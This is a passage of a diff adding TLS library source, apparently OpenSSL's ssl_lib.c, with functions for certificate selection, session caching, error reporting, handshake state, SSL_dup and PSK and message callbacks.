+    return 1;                   /* all checks are ok */
+}
+
+#endif
+
+static int ssl_get_server_cert_index(const SSL *s)
+{
+    int idx;
+    idx = ssl_cipher_get_cert_index(s->s3->tmp.new_cipher);
+    if (idx == SSL_PKEY_RSA_ENC && !s->cert->pkeys[SSL_PKEY_RSA_ENC].x509)
+        idx = SSL_PKEY_RSA_SIGN;
+    if (idx == -1)
+        SSLerr(SSL_F_SSL_GET_SERVER_CERT_INDEX, ERR_R_INTERNAL_ERROR);
+    return idx;
+}
+
+CERT_PKEY *ssl_get_server_send_pkey(const SSL *s)
+{
+    CERT *c;
+    int i;
+
+    c = s->cert;
+    if (!s->s3 || !s->s3->tmp.new_cipher)
+        return NULL;
+    ssl_set_cert_masks(c, s->s3->tmp.new_cipher);
+
+#ifdef OPENSSL_SSL_DEBUG_BROKEN_PROTOCOL
+    /*
+     * Broken protocol test: return last used certificate: which may mismatch
+     * the one expected.
+     */
+    if (c->cert_flags & SSL_CERT_FLAG_BROKEN_PROTOCOL)
+        return c->key;
+#endif
+
+    i = ssl_get_server_cert_index(s);
+
+    /* This may or may not be an error. */
+    if (i < 0)
+        return NULL;
+
+    /* May be NULL. */
+    return &c->pkeys[i];
+}
+
+EVP_PKEY *ssl_get_sign_pkey(SSL *s, const SSL_CIPHER *cipher,
+                            const EVP_MD **pmd)
+{
+    unsigned long alg_a;
+    CERT *c;
+    int idx = -1;
+
+    alg_a = cipher->algorithm_auth;
+    c = s->cert;
+
+#ifdef OPENSSL_SSL_DEBUG_BROKEN_PROTOCOL
+    /*
+     * Broken protocol test: use last key: which may mismatch the one
+     * expected.
+     */
+    if (c->cert_flags & SSL_CERT_FLAG_BROKEN_PROTOCOL)
+        idx = c->key - c->pkeys;
+    else
+#endif
+
+    if ((alg_a & SSL_aDSS) &&
+            (c->pkeys[SSL_PKEY_DSA_SIGN].privatekey != NULL))
+        idx = SSL_PKEY_DSA_SIGN;
+    else if (alg_a & SSL_aRSA) {
+        if (c->pkeys[SSL_PKEY_RSA_SIGN].privatekey != NULL)
+            idx = SSL_PKEY_RSA_SIGN;
+        else if (c->pkeys[SSL_PKEY_RSA_ENC].privatekey != NULL)
+            idx = SSL_PKEY_RSA_ENC;
+    } else if ((alg_a & SSL_aECDSA) &&
+               (c->pkeys[SSL_PKEY_ECC].privatekey != NULL))
+        idx = SSL_PKEY_ECC;
+    if (idx == -1) {
+        SSLerr(SSL_F_SSL_GET_SIGN_PKEY, ERR_R_INTERNAL_ERROR);
+        return (NULL);
+    }
+    if (pmd)
+        *pmd = c->pkeys[idx].digest;
+    return c->pkeys[idx].privatekey;
+}
+
+#ifndef OPENSSL_NO_TLSEXT
+int ssl_get_server_cert_serverinfo(SSL *s, const unsigned char **serverinfo,
+                                   size_t *serverinfo_length)
+{
+    CERT *c = NULL;
+    int i = 0;
+    *serverinfo_length = 0;
+
+    c = s->cert;
+    i = ssl_get_server_cert_index(s);
+
+    if (i == -1)
+        return 0;
+    if (c->pkeys[i].serverinfo == NULL)
+        return 0;
+
+    *serverinfo = c->pkeys[i].serverinfo;
+    *serverinfo_length = c->pkeys[i].serverinfo_length;
+    return 1;
+}
+#endif
+
+void ssl_update_cache(SSL *s, int mode)
+{
+    int i;
+
+    /*
+     * If the session_id_length is 0, we are not supposed to cache it, and it
+     * would be rather hard to do anyway :-)
+     */
+    if (s->session->session_id_length == 0)
+        return;
+
+    i = s->session_ctx->session_cache_mode;
+    if ((i & mode) && (!s->hit)
+        && ((i & SSL_SESS_CACHE_NO_INTERNAL_STORE)
+            || SSL_CTX_add_session(s->session_ctx, s->session))
+        && (s->session_ctx->new_session_cb != NULL)) {
+        CRYPTO_add(&s->session->references, 1, CRYPTO_LOCK_SSL_SESSION);
+        if (!s->session_ctx->new_session_cb(s, s->session))
+            SSL_SESSION_free(s->session);
+    }
+
+    /* auto flush every 255 connections */
+    if ((!(i & SSL_SESS_CACHE_NO_AUTO_CLEAR)) && ((i & mode) == mode)) {
+        if ((((mode & SSL_SESS_CACHE_CLIENT)
+              ? s->session_ctx->stats.sess_connect_good
+              : s->session_ctx->stats.sess_accept_good) & 0xff) == 0xff) {
+            SSL_CTX_flush_sessions(s->session_ctx, (unsigned long)time(NULL));
+        }
+    }
+}
+
+const SSL_METHOD *SSL_CTX_get_ssl_method(SSL_CTX *ctx)
+{
+    return ctx->method;
+}
+
+const SSL_METHOD *SSL_get_ssl_method(SSL *s)
+{
+    return (s->method);
+}
+
+int SSL_set_ssl_method(SSL *s, const SSL_METHOD *meth)
+{
+    int conn = -1;
+    int ret = 1;
+
+    if (s->method != meth) {
+        if (s->handshake_func != NULL)
+            conn = (s->handshake_func == s->method->ssl_connect);
+
+        if (s->method->version == meth->version)
+            s->method = meth;
+        else {
+            s->method->ssl_free(s);
+            s->method = meth;
+            ret = s->method->ssl_new(s);
+        }
+
+        if (conn == 1)
+            s->handshake_func = meth->ssl_connect;
+        else if (conn == 0)
+            s->handshake_func = meth->ssl_accept;
+    }
+    return (ret);
+}
+
+int SSL_get_error(const SSL *s, int i)
+{
+    int reason;
+    unsigned long l;
+    BIO *bio;
+
+    if (i > 0)
+        return (SSL_ERROR_NONE);
+
+    /*
+     * Make things return SSL_ERROR_SYSCALL when doing SSL_do_handshake etc,
+     * where we do encode the error
+     */
+    if ((l = ERR_peek_error()) != 0) {
+        if (ERR_GET_LIB(l) == ERR_LIB_SYS)
+            return (SSL_ERROR_SYSCALL);
+        else
+            return (SSL_ERROR_SSL);
+    }
+
+    if ((i < 0) && SSL_want_read(s)) {
+        bio = SSL_get_rbio(s);
+        if (BIO_should_read(bio))
+            return (SSL_ERROR_WANT_READ);
+        else if (BIO_should_write(bio))
+            /*
+             * This one doesn't make too much sense ... We never try to write
+             * to the rbio, and an application program where rbio and wbio
+             * are separate couldn't even know what it should wait for.
+             * However if we ever set s->rwstate incorrectly (so that we have
+             * SSL_want_read(s) instead of SSL_want_write(s)) and rbio and
+             * wbio *are* the same, this test works around that bug; so it
+             * might be safer to keep it.
+             */
+            return (SSL_ERROR_WANT_WRITE);
+        else if (BIO_should_io_special(bio)) {
+            reason = BIO_get_retry_reason(bio);
+            if (reason == BIO_RR_CONNECT)
+                return (SSL_ERROR_WANT_CONNECT);
+            else if (reason == BIO_RR_ACCEPT)
+                return (SSL_ERROR_WANT_ACCEPT);
+            else
+                return (SSL_ERROR_SYSCALL); /* unknown */
+        }
+    }
+
+    if ((i < 0) && SSL_want_write(s)) {
+        bio = SSL_get_wbio(s);
+        if (BIO_should_write(bio))
+            return (SSL_ERROR_WANT_WRITE);
+        else if (BIO_should_read(bio))
+            /*
+             * See above (SSL_want_read(s) with BIO_should_write(bio))
+             */
+            return (SSL_ERROR_WANT_READ);
+        else if (BIO_should_io_special(bio)) {
+            reason = BIO_get_retry_reason(bio);
+            if (reason == BIO_RR_CONNECT)
+                return (SSL_ERROR_WANT_CONNECT);
+            else if (reason == BIO_RR_ACCEPT)
+                return (SSL_ERROR_WANT_ACCEPT);
+            else
+                return (SSL_ERROR_SYSCALL);
+        }
+    }
+    if ((i < 0) && SSL_want_x509_lookup(s)) {
+        return (SSL_ERROR_WANT_X509_LOOKUP);
+    }
+
+    if (i == 0) {
+        if (s->version == SSL2_VERSION) {
+            /* assume it is the socket being closed */
+            return (SSL_ERROR_ZERO_RETURN);
+        } else {
+            if ((s->shutdown & SSL_RECEIVED_SHUTDOWN) &&
+                (s->s3->warn_alert == SSL_AD_CLOSE_NOTIFY))
+                return (SSL_ERROR_ZERO_RETURN);
+        }
+    }
+    return (SSL_ERROR_SYSCALL);
+}
+
+int SSL_do_handshake(SSL *s)
+{
+    int ret = 1;
+
+    if (s->handshake_func == NULL) {
+        SSLerr(SSL_F_SSL_DO_HANDSHAKE, SSL_R_CONNECTION_TYPE_NOT_SET);
+        return (-1);
+    }
+
+    s->method->ssl_renegotiate_check(s);
+
+    if (SSL_in_init(s) || SSL_in_before(s)) {
+        ret = s->handshake_func(s);
+    }
+    return (ret);
+}
+
+/*
+ * For the next 2 functions, SSL_clear() sets shutdown and so one of these
+ * calls will reset it
+ */
+void SSL_set_accept_state(SSL *s)
+{
+    s->server = 1;
+    s->shutdown = 0;
+    s->state = SSL_ST_ACCEPT | SSL_ST_BEFORE;
+    s->handshake_func = s->method->ssl_accept;
+    /* clear the current cipher */
+    ssl_clear_cipher_ctx(s);
+    ssl_clear_hash_ctx(&s->read_hash);
+    ssl_clear_hash_ctx(&s->write_hash);
+}
+
+void SSL_set_connect_state(SSL *s)
+{
+    s->server = 0;
+    s->shutdown = 0;
+    s->state = SSL_ST_CONNECT | SSL_ST_BEFORE;
+    s->handshake_func = s->method->ssl_connect;
+    /* clear the current cipher */
+    ssl_clear_cipher_ctx(s);
+    ssl_clear_hash_ctx(&s->read_hash);
+    ssl_clear_hash_ctx(&s->write_hash);
+}
+
+int ssl_undefined_function(SSL *s)
+{
+    SSLerr(SSL_F_SSL_UNDEFINED_FUNCTION, ERR_R_SHOULD_NOT_HAVE_BEEN_CALLED);
+    return (0);
+}
+
+int ssl_undefined_void_function(void)
+{
+    SSLerr(SSL_F_SSL_UNDEFINED_VOID_FUNCTION,
+           ERR_R_SHOULD_NOT_HAVE_BEEN_CALLED);
+    return (0);
+}
+
+int ssl_undefined_const_function(const SSL *s)
+{
+    SSLerr(SSL_F_SSL_UNDEFINED_CONST_FUNCTION,
+           ERR_R_SHOULD_NOT_HAVE_BEEN_CALLED);
+    return (0);
+}
+
+SSL_METHOD *ssl_bad_method(int ver)
+{
+    SSLerr(SSL_F_SSL_BAD_METHOD, ERR_R_SHOULD_NOT_HAVE_BEEN_CALLED);
+    return (NULL);
+}
+
+const char *SSL_get_version(const SSL *s)
+{
+    if (s->version == TLS1_2_VERSION)
+        return ("TLSv1.2");
+    else if (s->version == TLS1_1_VERSION)
+        return ("TLSv1.1");
+    else if (s->version == TLS1_VERSION)
+        return ("TLSv1");
+    else if (s->version == SSL3_VERSION)
+        return ("SSLv3");
+    else if (s->version == SSL2_VERSION)
+        return ("SSLv2");
+    else
+        return ("unknown");
+}
+
+SSL *SSL_dup(SSL *s)
+{
+    STACK_OF(X509_NAME) *sk;
+    X509_NAME *xn;
+    SSL *ret;
+    int i;
+
+    if ((ret = SSL_new(SSL_get_SSL_CTX(s))) == NULL)
+        return (NULL);
+
+    ret->version = s->version;
+    ret->type = s->type;
+    ret->method = s->method;
+
+    if (s->session != NULL) {
+        /* This copies session-id, SSL_METHOD, sid_ctx, and 'cert' */
+        SSL_copy_session_id(ret, s);
+    } else {
+        /*
+         * No session has been established yet, so we have to expect that
+         * s->cert or ret->cert will be changed later -- they should not both
+         * point to the same object, and thus we can't use
+         * SSL_copy_session_id.
+         */
+
+        ret->method->ssl_free(ret);
+        ret->method = s->method;
+        ret->method->ssl_new(ret);
+
+        if (s->cert != NULL) {
+            if (ret->cert != NULL) {
+                ssl_cert_free(ret->cert);
+            }
+            ret->cert = ssl_cert_dup(s->cert);
+            if (ret->cert == NULL)
+                goto err;
+        }
+
+        SSL_set_session_id_context(ret, s->sid_ctx, s->sid_ctx_length);
+    }
+
+    ret->options = s->options;
+    ret->mode = s->mode;
+    SSL_set_max_cert_list(ret, SSL_get_max_cert_list(s));
+    SSL_set_read_ahead(ret, SSL_get_read_ahead(s));
+    ret->msg_callback = s->msg_callback;
+    ret->msg_callback_arg = s->msg_callback_arg;
+    SSL_set_verify(ret, SSL_get_verify_mode(s), SSL_get_verify_callback(s));
+    SSL_set_verify_depth(ret, SSL_get_verify_depth(s));
+    ret->generate_session_id = s->generate_session_id;
+
+    SSL_set_info_callback(ret, SSL_get_info_callback(s));
+
+    ret->debug = s->debug;
+
+    /* copy app data, a little dangerous perhaps */
+    if (!CRYPTO_dup_ex_data(CRYPTO_EX_INDEX_SSL, &ret->ex_data, &s->ex_data))
+        goto err;
+
+    /* setup rbio, and wbio */
+    if (s->rbio != NULL) {
+        if (!BIO_dup_state(s->rbio, (char *)&ret->rbio))
+            goto err;
+    }
+    if (s->wbio != NULL) {
+        if (s->wbio != s->rbio) {
+            if (!BIO_dup_state(s->wbio, (char *)&ret->wbio))
+                goto err;
+        } else
+            ret->wbio = ret->rbio;
+    }
+    ret->rwstate = s->rwstate;
+    ret->in_handshake = s->in_handshake;
+    ret->handshake_func = s->handshake_func;
+    ret->server = s->server;
+    ret->renegotiate = s->renegotiate;
+    ret->new_session = s->new_session;
+    ret->quiet_shutdown = s->quiet_shutdown;
+    ret->shutdown = s->shutdown;
+    ret->state = s->state;      /* SSL_dup does not really work at any state,
+                                 * though */
+    ret->rstate = s->rstate;
+    ret->init_num = 0;          /* would have to copy ret->init_buf,
+                                 * ret->init_msg, ret->init_num,
+                                 * ret->init_off */
+    ret->hit = s->hit;
+
+    X509_VERIFY_PARAM_inherit(ret->param, s->param);
+
+    /* dup the cipher_list and cipher_list_by_id stacks */
+    if (s->cipher_list != NULL) {
+        if ((ret->cipher_list = sk_SSL_CIPHER_dup(s->cipher_list)) == NULL)
+            goto err;
+    }
+    if (s->cipher_list_by_id != NULL)
+        if ((ret->cipher_list_by_id = sk_SSL_CIPHER_dup(s->cipher_list_by_id))
+            == NULL)
+            goto err;
+
+    /* Dup the client_CA list */
+    if (s->client_CA != NULL) {
+        if ((sk = sk_X509_NAME_dup(s->client_CA)) == NULL)
+            goto err;
+        ret->client_CA = sk;
+        for (i = 0; i < sk_X509_NAME_num(sk); i++) {
+            xn = sk_X509_NAME_value(sk, i);
+            if (sk_X509_NAME_set(sk, i, X509_NAME_dup(xn)) == NULL) {
+                X509_NAME_free(xn);
+                goto err;
+            }
+        }
+    }
+
+    if (0) {
+ err:
+        if (ret != NULL)
+            SSL_free(ret);
+        ret = NULL;
+    }
+    return (ret);
+}
+
+void ssl_clear_cipher_ctx(SSL *s)
+{
+    if (s->enc_read_ctx != NULL) {
+        EVP_CIPHER_CTX_cleanup(s->enc_read_ctx);
+        OPENSSL_free(s->enc_read_ctx);
+        s->enc_read_ctx = NULL;
+    }
+    if (s->enc_write_ctx != NULL) {
+        EVP_CIPHER_CTX_cleanup(s->enc_write_ctx);
+        OPENSSL_free(s->enc_write_ctx);
+        s->enc_write_ctx = NULL;
+    }
+#ifndef OPENSSL_NO_COMP
+    if (s->expand != NULL) {
+        COMP_CTX_free(s->expand);
+        s->expand = NULL;
+    }
+    if (s->compress != NULL) {
+        COMP_CTX_free(s->compress);
+        s->compress = NULL;
+    }
+#endif
+}
+
+X509 *SSL_get_certificate(const SSL *s)
+{
+    if (s->cert != NULL)
+        return (s->cert->key->x509);
+    else
+        return (NULL);
+}
+
+EVP_PKEY *SSL_get_privatekey(const SSL *s)
+{
+    if (s->cert != NULL)
+        return (s->cert->key->privatekey);
+    else
+        return (NULL);
+}
+
+X509 *SSL_CTX_get0_certificate(const SSL_CTX *ctx)
+{
+    if (ctx->cert != NULL)
+        return ctx->cert->key->x509;
+    else
+        return NULL;
+}
+
+EVP_PKEY *SSL_CTX_get0_privatekey(const SSL_CTX *ctx)
+{
+    if (ctx->cert != NULL)
+        return ctx->cert->key->privatekey;
+    else
+        return NULL;
+}
+
+const SSL_CIPHER *SSL_get_current_cipher(const SSL *s)
+{
+    if ((s->session != NULL) && (s->session->cipher != NULL))
+        return (s->session->cipher);
+    return (NULL);
+}
+
+#ifdef OPENSSL_NO_COMP
+const void *SSL_get_current_compression(SSL *s)
+{
+    return NULL;
+}
+
+const void *SSL_get_current_expansion(SSL *s)
+{
+    return NULL;
+}
+#else
+
+const COMP_METHOD *SSL_get_current_compression(SSL *s)
+{
+    if (s->compress != NULL)
+        return (s->compress->meth);
+    return (NULL);
+}
+
+const COMP_METHOD *SSL_get_current_expansion(SSL *s)
+{
+    if (s->expand != NULL)
+        return (s->expand->meth);
+    return (NULL);
+}
+#endif
+
+int ssl_init_wbio_buffer(SSL *s, int push)
+{
+    BIO *bbio;
+
+    if (s->bbio == NULL) {
+        bbio = BIO_new(BIO_f_buffer());
+        if (bbio == NULL)
+            return (0);
+        s->bbio = bbio;
+    } else {
+        bbio = s->bbio;
+        if (s->bbio == s->wbio)
+            s->wbio = BIO_pop(s->wbio);
+    }
+    (void)BIO_reset(bbio);
+/*      if (!BIO_set_write_buffer_size(bbio,16*1024)) */
+    if (!BIO_set_read_buffer_size(bbio, 1)) {
+        SSLerr(SSL_F_SSL_INIT_WBIO_BUFFER, ERR_R_BUF_LIB);
+        return (0);
+    }
+    if (push) {
+        if (s->wbio != bbio)
+            s->wbio = BIO_push(bbio, s->wbio);
+    } else {
+        if (s->wbio == bbio)
+            s->wbio = BIO_pop(bbio);
+    }
+    return (1);
+}
+
+void ssl_free_wbio_buffer(SSL *s)
+{
+    if (s->bbio == NULL)
+        return;
+
+    if (s->bbio == s->wbio) {
+        /* remove buffering */
+        s->wbio = BIO_pop(s->wbio);
+#ifdef REF_CHECK                /* not the usual REF_CHECK, but this avoids
+                                 * adding one more preprocessor symbol */
+        assert(s->wbio != NULL);
+#endif
+    }
+    BIO_free(s->bbio);
+    s->bbio = NULL;
+}
+
+void SSL_CTX_set_quiet_shutdown(SSL_CTX *ctx, int mode)
+{
+    ctx->quiet_shutdown = mode;
+}
+
+int SSL_CTX_get_quiet_shutdown(const SSL_CTX *ctx)
+{
+    return (ctx->quiet_shutdown);
+}
+
+void SSL_set_quiet_shutdown(SSL *s, int mode)
+{
+    s->quiet_shutdown = mode;
+}
+
+int SSL_get_quiet_shutdown(const SSL *s)
+{
+    return (s->quiet_shutdown);
+}
+
+void SSL_set_shutdown(SSL *s, int mode)
+{
+    s->shutdown = mode;
+}
+
+int SSL_get_shutdown(const SSL *s)
+{
+    return (s->shutdown);
+}
+
+int SSL_version(const SSL *s)
+{
+    return (s->version);
+}
+
+SSL_CTX *SSL_get_SSL_CTX(const SSL *ssl)
+{
+    return (ssl->ctx);
+}
+
+SSL_CTX *SSL_set_SSL_CTX(SSL *ssl, SSL_CTX *ctx)
+{
+    CERT *ocert = ssl->cert;
+    if (ssl->ctx == ctx)
+        return ssl->ctx;
+#ifndef OPENSSL_NO_TLSEXT
+    if (ctx == NULL)
+        ctx = ssl->initial_ctx;
+#endif
+    ssl->cert = ssl_cert_dup(ctx->cert);
+    if (ocert) {
+        /* Preserve any already negotiated parameters */
+        if (ssl->server) {
+            ssl->cert->peer_sigalgs = ocert->peer_sigalgs;
+            ssl->cert->peer_sigalgslen = ocert->peer_sigalgslen;
+            ocert->peer_sigalgs = NULL;
+            ssl->cert->ciphers_raw = ocert->ciphers_raw;
+            ssl->cert->ciphers_rawlen = ocert->ciphers_rawlen;
+            ocert->ciphers_raw = NULL;
+        }
+        ssl_cert_free(ocert);
+    }
+
+    /*
+     * Program invariant: |sid_ctx| has fixed size (SSL_MAX_SID_CTX_LENGTH),
+     * so setter APIs must prevent invalid lengths from entering the system.
+     */
+    OPENSSL_assert(ssl->sid_ctx_length <= sizeof(ssl->sid_ctx));
+
+    /*
+     * If the session ID context matches that of the parent SSL_CTX,
+     * inherit it from the new SSL_CTX as well. If however the context does
+     * not match (i.e., it was set per-ssl with SSL_set_session_id_context),
+     * leave it unchanged.
+     */
+    if ((ssl->ctx != NULL) &&
+        (ssl->sid_ctx_length == ssl->ctx->sid_ctx_length) &&
+        (memcmp(ssl->sid_ctx, ssl->ctx->sid_ctx, ssl->sid_ctx_length) == 0)) {
+        ssl->sid_ctx_length = ctx->sid_ctx_length;
+        memcpy(&ssl->sid_ctx, &ctx->sid_ctx, sizeof(ssl->sid_ctx));
+    }
+
+    CRYPTO_add(&ctx->references, 1, CRYPTO_LOCK_SSL_CTX);
+    if (ssl->ctx != NULL)
+        SSL_CTX_free(ssl->ctx); /* decrement reference count */
+    ssl->ctx = ctx;
+
+    return (ssl->ctx);
+}
+
+#ifndef OPENSSL_NO_STDIO
+int SSL_CTX_set_default_verify_paths(SSL_CTX *ctx)
+{
+    return (X509_STORE_set_default_paths(ctx->cert_store));
+}
+
+int SSL_CTX_load_verify_locations(SSL_CTX *ctx, const char *CAfile,
+                                  const char *CApath)
+{
+    return (X509_STORE_load_locations(ctx->cert_store, CAfile, CApath));
+}
+#endif
+
+void SSL_set_info_callback(SSL *ssl,
+                           void (*cb) (const SSL *ssl, int type, int val))
+{
+    ssl->info_callback = cb;
+}
+
+/*
+ * One compiler (Diab DCC) doesn't like argument names in returned function
+ * pointer.
+ */
+void (*SSL_get_info_callback(const SSL *ssl)) (const SSL * /* ssl */ ,
+                                               int /* type */ ,
+                                               int /* val */ ) {
+    return ssl->info_callback;
+}
+
+int SSL_state(const SSL *ssl)
+{
+    return (ssl->state);
+}
+
+void SSL_set_state(SSL *ssl, int state)
+{
+    ssl->state = state;
+}
+
+void SSL_set_verify_result(SSL *ssl, long arg)
+{
+    ssl->verify_result = arg;
+}
+
+long SSL_get_verify_result(const SSL *ssl)
+{
+    return (ssl->verify_result);
+}
+
+int SSL_get_ex_new_index(long argl, void *argp, CRYPTO_EX_new *new_func,
+                         CRYPTO_EX_dup *dup_func, CRYPTO_EX_free *free_func)
+{
+    return CRYPTO_get_ex_new_index(CRYPTO_EX_INDEX_SSL, argl, argp,
+                                   new_func, dup_func, free_func);
+}
+
+int SSL_set_ex_data(SSL *s, int idx, void *arg)
+{
+    return (CRYPTO_set_ex_data(&s->ex_data, idx, arg));
+}
+
+void *SSL_get_ex_data(const SSL *s, int idx)
+{
+    return (CRYPTO_get_ex_data(&s->ex_data, idx));
+}
+
+int SSL_CTX_get_ex_new_index(long argl, void *argp, CRYPTO_EX_new *new_func,
+                             CRYPTO_EX_dup *dup_func,
+                             CRYPTO_EX_free *free_func)
+{
+    return CRYPTO_get_ex_new_index(CRYPTO_EX_INDEX_SSL_CTX, argl, argp,
+                                   new_func, dup_func, free_func);
+}
+
+int SSL_CTX_set_ex_data(SSL_CTX *s, int idx, void *arg)
+{
+    return (CRYPTO_set_ex_data(&s->ex_data, idx, arg));
+}
+
+void *SSL_CTX_get_ex_data(const SSL_CTX *s, int idx)
+{
+    return (CRYPTO_get_ex_data(&s->ex_data, idx));
+}
+
+int ssl_ok(SSL *s)
+{
+    return (1);
+}
+
+X509_STORE *SSL_CTX_get_cert_store(const SSL_CTX *ctx)
+{
+    return (ctx->cert_store);
+}
+
+void SSL_CTX_set_cert_store(SSL_CTX *ctx, X509_STORE *store)
+{
+    if (ctx->cert_store != NULL)
+        X509_STORE_free(ctx->cert_store);
+    ctx->cert_store = store;
+}
+
+int SSL_want(const SSL *s)
+{
+    return (s->rwstate);
+}
+
+/**
+ * \brief Set the callback for generating temporary RSA keys.
+ * \param ctx the SSL context.
+ * \param cb the callback
+ */
+
+#ifndef OPENSSL_NO_RSA
+void SSL_CTX_set_tmp_rsa_callback(SSL_CTX *ctx, RSA *(*cb) (SSL *ssl,
+                                                            int is_export,
+                                                            int keylength))
+{
+    SSL_CTX_callback_ctrl(ctx, SSL_CTRL_SET_TMP_RSA_CB, (void (*)(void))cb);
+}
+
+void SSL_set_tmp_rsa_callback(SSL *ssl, RSA *(*cb) (SSL *ssl,
+                                                    int is_export,
+                                                    int keylength))
+{
+    SSL_callback_ctrl(ssl, SSL_CTRL_SET_TMP_RSA_CB, (void (*)(void))cb);
+}
+#endif
+
+#ifdef DOXYGEN
+/**
+ * \brief The RSA temporary key callback function.
+ * \param ssl the SSL session.
+ * \param is_export \c TRUE if the temp RSA key is for an export ciphersuite.
+ * \param keylength if \c is_export is \c TRUE, then \c keylength is the size
+ * of the required key in bits.
+ * \return the temporary RSA key.
+ * \sa SSL_CTX_set_tmp_rsa_callback, SSL_set_tmp_rsa_callback
+ */
+
+RSA *cb(SSL *ssl, int is_export, int keylength)
+{
+}
+#endif
+
+/**
+ * \brief Set the callback for generating temporary DH keys.
+ * \param ctx the SSL context.
+ * \param dh the callback
+ */
+
+#ifndef OPENSSL_NO_DH
+void SSL_CTX_set_tmp_dh_callback(SSL_CTX *ctx,
+                                 DH *(*dh) (SSL *ssl, int is_export,
+                                            int keylength))
+{
+    SSL_CTX_callback_ctrl(ctx, SSL_CTRL_SET_TMP_DH_CB, (void (*)(void))dh);
+}
+
+void SSL_set_tmp_dh_callback(SSL *ssl, DH *(*dh) (SSL *ssl, int is_export,
+                                                  int keylength))
+{
+    SSL_callback_ctrl(ssl, SSL_CTRL_SET_TMP_DH_CB, (void (*)(void))dh);
+}
+#endif
+
+#ifndef OPENSSL_NO_ECDH
+void SSL_CTX_set_tmp_ecdh_callback(SSL_CTX *ctx,
+                                   EC_KEY *(*ecdh) (SSL *ssl, int is_export,
+                                                    int keylength))
+{
+    SSL_CTX_callback_ctrl(ctx, SSL_CTRL_SET_TMP_ECDH_CB,
+                          (void (*)(void))ecdh);
+}
+
+void SSL_set_tmp_ecdh_callback(SSL *ssl,
+                               EC_KEY *(*ecdh) (SSL *ssl, int is_export,
+                                                int keylength))
+{
+    SSL_callback_ctrl(ssl, SSL_CTRL_SET_TMP_ECDH_CB, (void (*)(void))ecdh);
+}
+#endif
+
+#ifndef OPENSSL_NO_PSK
+int SSL_CTX_use_psk_identity_hint(SSL_CTX *ctx, const char *identity_hint)
+{
+    if (identity_hint != NULL && strlen(identity_hint) > PSK_MAX_IDENTITY_LEN) {
+        SSLerr(SSL_F_SSL_CTX_USE_PSK_IDENTITY_HINT,
+               SSL_R_DATA_LENGTH_TOO_LONG);
+        return 0;
+    }
+    if (ctx->psk_identity_hint != NULL)
+        OPENSSL_free(ctx->psk_identity_hint);
+    if (identity_hint != NULL) {
+        ctx->psk_identity_hint = BUF_strdup(identity_hint);
+        if (ctx->psk_identity_hint == NULL)
+            return 0;
+    } else
+        ctx->psk_identity_hint = NULL;
+    return 1;
+}
+
+int SSL_use_psk_identity_hint(SSL *s, const char *identity_hint)
+{
+    if (s == NULL)
+        return 0;
+
+    if (s->session == NULL)
+        return 1;               /* session not created yet, ignored */
+
+    if (identity_hint != NULL && strlen(identity_hint) > PSK_MAX_IDENTITY_LEN) {
+        SSLerr(SSL_F_SSL_USE_PSK_IDENTITY_HINT, SSL_R_DATA_LENGTH_TOO_LONG);
+        return 0;
+    }
+    if (s->session->psk_identity_hint != NULL)
+        OPENSSL_free(s->session->psk_identity_hint);
+    if (identity_hint != NULL) {
+        s->session->psk_identity_hint = BUF_strdup(identity_hint);
+        if (s->session->psk_identity_hint == NULL)
+            return 0;
+    } else
+        s->session->psk_identity_hint = NULL;
+    return 1;
+}
+
+const char *SSL_get_psk_identity_hint(const SSL *s)
+{
+    if (s == NULL || s->session == NULL)
+        return NULL;
+    return (s->session->psk_identity_hint);
+}
+
+const char *SSL_get_psk_identity(const SSL *s)
+{
+    if (s == NULL || s->session == NULL)
+        return NULL;
+    return (s->session->psk_identity);
+}
+
+void SSL_set_psk_client_callback(SSL *s,
+                                 unsigned int (*cb) (SSL *ssl,
+                                                     const char *hint,
+                                                     char *identity,
+                                                     unsigned int
+                                                     max_identity_len,
+                                                     unsigned char *psk,
+                                                     unsigned int
+                                                     max_psk_len))
+{
+    s->psk_client_callback = cb;
+}
+
+void SSL_CTX_set_psk_client_callback(SSL_CTX *ctx,
+                                     unsigned int (*cb) (SSL *ssl,
+                                                         const char *hint,
+                                                         char *identity,
+                                                         unsigned int
+                                                         max_identity_len,
+                                                         unsigned char *psk,
+                                                         unsigned int
+                                                         max_psk_len))
+{
+    ctx->psk_client_callback = cb;
+}
+
+void SSL_set_psk_server_callback(SSL *s,
+                                 unsigned int (*cb) (SSL *ssl,
+                                                     const char *identity,
+                                                     unsigned char *psk,
+                                                     unsigned int
+                                                     max_psk_len))
+{
+    s->psk_server_callback = cb;
+}
+
+void SSL_CTX_set_psk_server_callback(SSL_CTX *ctx,
+                                     unsigned int (*cb) (SSL *ssl,
+                                                         const char *identity,
+                                                         unsigned char *psk,
+                                                         unsigned int
+                                                         max_psk_len))
+{
+    ctx->psk_server_callback = cb;
+}
+#endif
+
+void SSL_CTX_set_msg_callback(SSL_CTX *ctx,
+                              void (*cb) (int write_p, int version,
+                                          int content_type, const void *buf,
+                                          size_t len, SSL *ssl, void *arg))
+{
+    SSL_CTX_callback_ctrl(ctx, SSL_CTRL_SET_MSG_CALLBACK, (void (*)(void))cb);
+}
+
+void SSL_set_msg_callback(SSL *ssl,
+                          void (*cb) (int write_p, int version,
+                                      int content_type, const void *buf,
+                                      size_t len, SSL *ssl, void *arg))
+{
+    SSL_callback_ctrl(ssl, SSL_CTRL_SET_MSG_CALLBACK, (void (*)(void))cb);
+}
+
+/*
+ * Allocates new EVP_MD_CTX and sets pointer to it into given pointer
+ * vairable, freeing EVP_MD_CTX previously stored in that variable, if any.
+ * If EVP_MD pointer is passed, initializes ctx with this md Returns newly
+ * allocated ctx;
+ */
+
+EVP_MD_CTX *ssl_replace_hash(EVP_MD_CTX **hash, const EVP_MD *md)
+{
+    ssl_clear_hash_ctx(hash);
+    *hash = EVP_MD_CTX_create();
+    if (md)
+        EVP_DigestInit_ex(*hash, md, NULL);
+    return *hash;
+}
+
+void ssl_clear_hash_ctx(EVP_MD_CTX **hash)
+{
+
+    if (*hash)
+        EVP_MD_CTX_destroy(*hash);
+    *hash = NULL;
+}
+
+void SSL_set_debug(SSL *s, int debug)
+{
+    s->debug = debug;
+}
+
+int SSL_cache_hit(SSL *s)
+{
+    return s->hit;
+}
+
+int SSL_is_server(SSL *s)
+{
+    return s->server;
+}
+
+#if defined(_WINDLL) && defined(OPENSSL_SYS_WIN16)
+# include "../crypto/bio/bss_file.c"
+#endif
+
+IMPLEMENT_STACK_OF(SSL_CIPHER)
+IMPLEMENT_STACK_OF(SSL_COMP)
+IMPLEMENT_OBJ_BSEARCH_GLOBAL_CMP_FN(SSL_CIPHER, SSL_CIPHER, ssl_cipher_id);
